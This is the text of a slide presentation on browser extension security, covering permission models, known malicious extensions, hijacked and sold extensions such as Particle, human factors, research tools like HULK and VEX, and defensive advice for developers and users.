Browser Extension Compromise

Caroline Sheng

Outline �  Introduction

�  Privileges and Permissions

�  Malware extensions

�  Security Threats

�  Human Factors

�  Problems

�  Where do we go from here?

�  What can you do?

Introduction �  What are browser extensions?

�  A piece of software

�  What do they do? �  Extend functionality of web browsers

�  Who can create them? �  Basically anyone �  Many popular extensions are written by third party

developers

Extension Statistics �  Popular examples:

�  AdBlock – 40 million users on Chrome

�  TamperMonkey – 10,000,000+ users �  Google Mail Checker – 5,000,000+ users on Chrome

�  In 2011, 85% of Firefox users had at least one extension installed

Source: Chrome Web Store

Privileges and Permissions �  Privileges: how much access does the extension

have to your browser

�  Extensions often require high privileges, which can put users at risk

Privileges and Permissions (cont.)

�  Until 2017, all Firefox extensions were allowed complete browser privileges �  Allowed file system and network access

�  Did not follow practice of least privilege: Restricting access to only the resources required to perform activities

Permission Systems �  Now, Firefox, Chrome, and Internet Explorer all have

similar permission systems: �  Developers: must define what privileges their

extension requires �  Users: are notified of what permissions an extension

requires before installing it

Permission Warning

�  Tampermonkey: provides environment for users to write small scripts to modify browser behavior

More privileges required

�  Web Developer: Adds a toolbar to browser with web development tools

“Read and change all your data on the websites you visit” �  Sounds like dangerously high privilege �  Actually is a required permission for many legitimate

extensions

�  Some extensions have even broader permissions

What’s wrong with this? �  The nature of many browser extensions (both

legitimate and not) requires them to have almost completely unrestrained access

�  Once installed, extension code is fully trusted by browser, even though they are essentially third-party code

�  Offers an easy attack vector for those with malicious intent

So what? �  Some browser extensions have been downloaded by

millions of users

�  If a browser extension is compromised, all users may be affected

A brief look at malware extensions

What malicious extensions are capable of

Malware Extensions �  More common than we think:

�  An analysis by security researchers of 48,000 Chrome extensions in 2014 found �  130 outright malicious extensions

�  4,712 suspicious extensions

�  The malicious extensions engaged in a variety of: �  Affiliate fraud

�  Credential theft

�  Advertising fraud

�  Social network abuse

Malware Extensions (cont.) �  Examples of malware extensions:

�  FormSpy – 2006 �  Trojan which installed itself as a legitimate Firefox

extension.

�  Intercepts password and credit card numbers entered into browser

�  Interface Online – 2017 �  Bank fraud scam

�  Logged username and passwords entered into forms

�  Was available for two weeks before being taken down by Google

Security Threats How are browser extensions compromised?

Security Threats �  Benign extensions hacked

�  Code Vulnerabilities

�  Social Engineering

�  Extensions bought, sold, and changed �  Popular extension developers offered significant sums

to sell their extension to suspicious parties

Code Vulnerabilities �  At DEFCON 2009, Liverani and Freeman

demonstrated attacks against a number of popular Firefox extensions

�  Many of the vulnerabilities found were among the OWASP Top 10

�  Ex: “if a user dragged an image from a malicious web page into the extension, the web site operator could install a remote desktop server on the user’s machine and take control of the user’s mouse and keyboard” [2]

Social Engineering �  Example: August 2017, Web Developer extension

updated to supply adware to users because the creator (Chris Pederick) fell for a phishing attack

�  One of the ads displayed by a fraudulently updated version of Web Developer extension for Chrome

Source: [6] Ars Technica

Extension Ownership: Particle

�  In July 2017, Chrome extension Particle sold by original developer to another party, who promptly turned it into adware

An extension update �  Chrome’s permission system meant users were

informed that a new update to Particle required new permissions it had never required before: �  “Read and change data on (all) websites visited” �  “Manage apps, extensions, and themes”

�  However, many users still accepted the new update and were then bombarded by ads

�  New owner added code to inject ads such as Google, Bing, Amazon, eBay

Source: [4] BleepingComputer

Lack of Transparency �  A trusted extension introduced adware in a

subsequent update

�  Users were not notified of the change in ownership

�  Users believed extension was safe, and accepted the update. Allowing Particle the privileges it required to insert ads

Human Factors: Developers �  Extensions can be very simple to create, many treat

it as a hobby

�  Most extension developers are not security experts

�  Unaware of danger of vulnerable extensions

Human Factors: Reviewers �  Guidelines for accepting or rejecting extensions

focus more on malicious extensions

�  Vulnerable extensions very easily slip through the net

Human Factors: Users �  Users believe extensions are inherently safe

�  Often install extensions without checking

�  Unaware that extensions are often created by third party developers

Problems (Summary) �  There is no standard secure framework for creating

extensions

�  Extensions are not evaluated for vulnerabilities before being released to the public

�  Users have no way of defending themselves if a trusted extension they have installed is hacked

Where do we go from here? �  In security research:

�  HULK: a dynamic analysis system presented at the USINEX 2014 Security Symposium �  Detects malicious behavior in browser extensions by

monitoring their execution and corresponding network activity

�  VEX: “a framework for highlighting potential security vulnerabilities in browser extensions by applying static information-flow analysis to extension Javascript code”

What can you do? �  Developers:

�  Follow OWASP Top 10 guide

�  Be wary of allowing others access/control to your extension

�  Users: �  Carefully evaluate extensions before deciding to

install or update them �  Don’t install unnecessary extensions

References �  [1] Sruthi Bandhakavi, Samuel T. King, P. Madhusudan, Marianne Winslett. VEX: Vetting

Browser Extensions For Security Vulnerabilities. Communications of the ACM, v.54 n.9, 2011.

�  [2] Adam Barth, Adrienne Porter Felt, Prateek Saxena Aaron Boodman. Protecting Browsers from Extension Vulnerabilities. In Proceedings of the 17th Network and Distributed System Security Symposium (NDSS Symposium 2010).

�  [3] Martin Brinkmann. gHacks Technology News. Firefox’s new WebExtensions permission system. URL: https://www.ghacks.net/2017/03/06/firefoxs-new-webextensions-permission-system/

�  [4] Catalin Cimpanu. BleepingComputer. URL: https://www.bleepingcomputer.com/news/security/-particle-chrome-extension-sold-to-new-dev-who-immediately-turns-it-into-adware/ 

�  [5] Chromium Blog: December 2013. URL: https://blog.chromium.org/2013/12/keeping-chrome-extensions-simple.html

�  [6] Dan Goodin. Ars Technica. After phishing attacks, Chrome extensions push adware to millions. URL: https://arstechnica.com/information-technology/2017/08/after-phishing-attacks-chrome-extensions-push-adware-to-millions/

�  [7] Dan Goodin. Ars Technica. Bank-fraud malware not detected by any AV hosted in Chrome web store. Twice. URL: https://arstechnica.com/information-technology/2017/08/bank-fraud-malware-not-detected-by-any-av-hosted-in-chrome-web-store-twice/

�  [8] C. Grier, S. T. King, and D. S. Wallach. How I Learned to Stop Worrying and Love Plugins. In Web 2.0 Security and Privacy, 2009.

�  [9[Alexandros Kapravelos, Chris Grier, Neha Chachra, Chris Kruegel, Giovanni Vigna, and Vern Paxson. Hulk: Eliciting malicious behavior in browser extensions. In Proceedings of the USENIX Security Symposium, 2014.

�  [10] R. S. Liverani and N. Freeman. Abusing Firefox Extensions. DEFCON17, July 2009

�  [11] Lee Matthews. Forbes. Over A Million Coders Targeted By Chrome Extension Hack. URL: https://www.forbes.com/sites/leemathews/2017/08/03/over-a-million-coders-targeted-by-chrome-extension-hack/#5d5d3c289c9d

�   [12] Mozilla Add-ons Blog. June 2011. URL: https://blog.mozilla.org/addons/2011/06/21/firefox-4-add-on-users/

�   [13] Particle Core. Particle. Github Repository. URL: https://github.com/ParticleCore/Particle/issues/528

�   [14] Adrienne Porter Felt. Least Privilege for Browser Extensions. Master’s thesis. University of California, Berkeley